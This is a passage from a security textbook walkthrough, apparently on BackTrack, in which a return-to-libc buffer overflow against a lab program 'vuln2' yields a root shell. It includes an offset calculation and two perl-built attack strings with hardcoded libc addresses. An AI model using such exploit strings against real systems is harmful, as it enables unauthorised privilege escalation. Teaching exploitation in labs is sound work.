Exit anyway? (y or n) y
BT book $
Now that we have the location of the beginning of the buffer, add the calculated offset
from earlier to get the correct target location (sixth memory slot after our overflowed
buffer).
0xbffff560 + 0x30 = 0xbffff590
Finally, we have all the data we need; let??™s attack!
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
"\x80\x65\xee\xb7"."\x70\xf8\xf2\xb7"."\xe5\xfd\xff\xbf"."\x02\xfe\xff\
xbf"."\x02\xfe\xff\xbf"."\x90\xf5\xff\xbf"' `
sh-3.1# exit
exit
BT book $
Woot! It worked. Some of you may have realized a shortcut here. If you look at the last
illustration, you will notice the last value of the attack string is a NULL. Occasionally,
you will run into this situation. In that rare case, you don??™t care if you pass a NULL byte
into the vulnerable program, as the string will terminate by a NULL anyway. So, in this
canned scenario, you could have removed the printf() function and simply fed the
execl() attack string as follows:
./vuln2 [filler of 28 bytes][&execl][&exit][./wrapper][./wrapper][\x00]
Try it.
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
"\x70\xf8\xf2\xb7"."\xa0\xe3\xec\xb7"."\x02\xfe\xff\xbf"."\x02\xfe\xff\
xbf"."\x00"' `
sh-3.1# exit
exit
BT book $
Both ways work in this case.
Pages:
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378